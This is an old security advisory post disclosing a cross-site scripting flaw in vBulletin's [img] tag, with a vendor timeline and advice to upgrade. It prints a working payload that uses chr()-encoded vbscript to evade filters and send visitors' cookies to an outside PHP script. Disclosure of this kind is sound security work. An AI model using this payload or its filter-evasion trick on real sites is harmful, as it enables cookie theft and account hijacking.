Hi I've discovered a vulnerability in the vBulletins's [img]-Tag implementation, that allows users to inject vbs-code in posts and private messages ([img] is switched on by default). Through that, an attacker is able to steal other users cookies and maybe hijack their accounts. The following code sends the user's cookie to a php-script (http://www.ignite.barrysworld.net/test.php?c= in this case, which just prints it back to the browser) It is enclosed in [code]-Tag, the url is encoded in ascii and linebreaks are inserted to avoid filtering of some characters and insertion of <br>-Tags [code][img]vbscript:location.replace( chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+ chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+ chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+ chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+ chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+ chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+ chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+ chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+ chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+ escape(document.cookie) )[/img][/code] History: Feb 19 02: contacted Jelsoft Feb 20 02: Vendor confirmed the bug Feb 21 02: Jelsoft claimed to have made a patch "which clamps down on what characters are allowed in an [img] tag, as well as requiring it to start with http://";. Sounds good ;) vBulletin 2.2.3 & 2.2.4 are out for some weeks, but there are still sites using vulnerable versions, so better update! lates, Cano2 mailto:Cano2@buhaboard.de -- Wirklich reich sind die, die mehr Träume haben als die Realität zerstören kann BuHa-Security Board www.buhaboard.de
